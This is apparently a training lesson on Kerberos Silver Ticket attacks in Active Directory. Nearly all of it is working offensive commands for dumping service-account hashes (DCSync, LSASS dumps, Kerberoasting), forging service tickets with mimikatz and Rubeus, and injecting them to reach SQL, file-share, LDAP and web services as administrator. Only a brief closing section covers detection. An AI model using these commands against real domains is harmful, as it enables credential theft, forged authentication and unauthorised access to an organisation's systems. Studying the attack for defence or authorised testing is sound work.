Silver Ticket Attack - Module 4 Lesson 3

Objectives

Understand Silver Ticket attack methodology
Learn service account hash extraction techniques
Master Silver Ticket creation for specific services
Implement targeted service access

What is a Silver Ticket?

A Silver Ticket is a forged Service Ticket (ST) that allows an attacker to authenticate to specific services without going through the normal Kerberos authentication process.

Silver Ticket Characteristics:

Service-specific: Targets individual services
No TGT required: Bypasses Key Distribution Center
Limited scope: Only works for the specified service
Stealthier: Less detectable than Golden Tickets

Golden Ticket vs Silver Ticket

Characteristic	Golden Ticket	Silver Ticket
Target	Domain-wide access	Specific service
Required Hash	KRBTGT	Service account
Ticket Type	TGT	ST
KDC Interaction	Required for new STs	Not required
Detection	More detectable	Less detectable

Prerequisites for Silver Ticket Attack

To create a Silver Ticket, an attacker needs:

1. Service Account Hash

The hash of the service account that the target service runs under.

Common Service Accounts:

SQL Services: MSSQL, SQLSERVER
Web Services: IIS, APPPOOL
File Services: CIFS, SMB
LDAP Services: LDAP, GC
HTTP Services: HTTP, HTTPS

2. Service Principal Name (SPN)

The SPN uniquely identifies a service instance in the domain.

# SPN Format: service/hostname:port/realm
# Examples:
MSSQLSvc/dbserver.corp.local:1433
HTTP/webserver.corp.local:80
CIFS/fileserver.corp.local:445
LDAP/dc.corp.local:389

3. Target Service Information

Information about the target service including hostname and port.

Service Account Hash Extraction

Method 1: DCSync Attack

Extract service account hashes using DCSync:

# Using Mimikatz
mimikatz # lsadump::dcsync /domain:corp.local /user:mssql_service

# Using Impacket
secretsdump.py -dc-ip 192.168.1.10 corp.local/compromised_user:password@192.168.1.10

# Using Rubeus
Rubeus.exe dcsync /user:mssql_service /domain:corp.local

Method 2: LSASS Memory Dump

Extract hashes from LSASS memory on the service host:

# Using Mimikatz on target system
mimikatz # sekurlsa::logonpasswords
mimikatz # sekurlsa::tickets /export

# Using ProcDump + Mimikatz
procdump.exe -accepteula -ma lsass.exe lsass.dmp
mimikatz # sekurlsa::minidump lsass.dmp

Method 3: Kerberoasting

Request service tickets and crack them offline:

# Using Rubeus
Rubeus.exe kerberoast /user:mssql_service /format:hashcat

# Using Impacket
GetUserSPNs.py -request corp.local/user:password -dc-ip 192.168.1.10

Silver Ticket Creation Process

Step 1: Identify Target Service

Enumerate services and their SPNs:

# Using PowerView
Get-NetUser -SPN | Where-Object {$_.serviceprincipalname -like "*MSSQL*"}

# Using PowerShell
Get-ADUser -Filter "ServicePrincipalName -like '*MSSQL*'" -Properties ServicePrincipalName

# Using setspn.exe
setspn.exe -Q */*

Step 2: Create Silver Ticket

Create the Silver Ticket using the service account hash:

# Using Mimikatz for SQL Server
mimikatz # kerberos::golden /domain:corp.local /sid:S-1-5-21-1234567890-1234567890-1234567890 /target:dbserver.corp.local:1433 /service:MSSQLSvc /rc4:aad3b435b51404eeaad3b435b51404ee:1234567890abcdef1234567890abcdef /user:administrator /id:500 /groups:512,513,518,519,520 /ticket:sql_silver.kirbi

# Using Mimikatz for CIFS
mimikatz # kerberos::golden /domain:corp.local /sid:S-1-5-21-1234567890-1234567890-1234567890 /target:fileserver.corp.local /service:cifs /rc4:hash /user:administrator /ticket:cifs_silver.kirbi

# Using Rubeus
Rubeus.exe silver /rc4:hash /domain:corp.local /sid:S-1-5-21-1234567890-1234567890-1234567890 /target:dbserver.corp.local /service:MSSQLSvc /user:administrator /groups:512,513,518,519,520

Step 3: Inject Silver Ticket

Inject the Silver Ticket into memory:

# Using Mimikatz
mimikatz # kerberos::ptt sql_silver.kirbi

# Using Rubeus
Rubeus.exe ptt /ticket:sql_silver.kirbi

# Verify ticket injection
klist

Service-Specific Silver Tickets

SQL Server Silver Tickets

Create Silver Tickets for SQL Server access:

# SQL Server Silver Ticket
mimikatz # kerberos::golden /domain:corp.local /sid:domain_sid /target:dbserver.corp.local:1433 /service:MSSQLSvc /rc4:sql_service_hash /user:administrator /ticket:sql_silver.kirbi

# Access SQL Server
sqlcmd -S dbserver.corp.local -E

File Share Silver Tickets

Create Silver Tickets for file share access:

# CIFS Silver Ticket
mimikatz # kerberos::golden /domain:corp.local /sid:domain_sid /target:fileserver.corp.local /service:cifs /rc4:cifs_service_hash /user:administrator /ticket:cifs_silver.kirbi

# Access file share
dir \\fileserver.corp.local\share

LDAP Silver Tickets

Create Silver Tickets for LDAP access:

# LDAP Silver Ticket
mimikatz # kerberos::golden /domain:corp.local /sid:domain_sid /target:dc.corp.local /service:ldap /rc4:ldap_service_hash /user:administrator /ticket:ldap_silver.kirbi

# Query LDAP
ldapsearch -H ldap://dc.corp.local -D "CN=administrator,CN=Users,DC=corp,DC=local" -W -b "DC=corp,DC=local"

HTTP Silver Tickets

Create Silver Tickets for web service access:

# HTTP Silver Ticket
mimikatz # kerberos::golden /domain:corp.local /sid:domain_sid /target:webserver.corp.local /service:http /rc4:http_service_hash /user:administrator /ticket:http_silver.kirbi

# Access web service
curl -k https://webserver.corp.local/admin

Advanced Silver Ticket Techniques

1. Custom PAC for Service Access

Create Silver Tickets with specific privileges:

# Silver Ticket with custom SIDs
mimikatz # kerberos::golden /domain:corp.local /sid:domain_sid /target:service.corp.local /service:service_type /rc4:hash /user:service_user /id:1001 /groups:512 /sids:S-1-5-21-1234567890-1234567890-1234567890-519

2. Cross-Domain Silver Tickets

Create Silver Tickets for trusted domain services:

# Silver Ticket for trusted domain
mimikatz # kerberos::golden /domain:trusted.local /sid:trusted_sid /target:service.trusted.local /service:service_type /rc4:trusted_hash /user:administrator /ticket:trusted_silver.kirbi

3. Multiple Service Silver Tickets

Create Silver Tickets for multiple related services:

# Create tickets for multiple SQL instances
mimikatz # kerberos::golden /domain:corp.local /sid:domain_sid /target:sql1.corp.local:1433 /service:MSSQLSvc /rc4:hash /user:admin /ticket:sql1.kirbi
mimikatz # kerberos::golden /domain:corp.local /sid:domain_sid /target:sql2.corp.local:1433 /service:MSSQLSvc /rc4:hash /user:admin /ticket:sql2.kirbi

Silver Ticket Detection

Detecting Silver Ticket attacks requires monitoring service-specific events.

Detection Indicators

Event ID 4769: Kerberos service ticket was requested
Event ID 4624: Successful logon with forged tickets
Service log anomalies: Unusual service access patterns
Network monitoring: Service requests without TGT
Authentication logs: Service logins from unexpected sources

Monitoring Commands

# Monitor for service ticket requests
Get-WinEvent -FilterHashtable @{LogName='Security'; ID=4769} | Where-Object {$_.Message -match "MSSQLSvc"}

# Check for unusual service access
Get-WinEvent -FilterHashtable @{LogName='Security'; ID=4624} | Where-Object {$_.Message -match "Service"}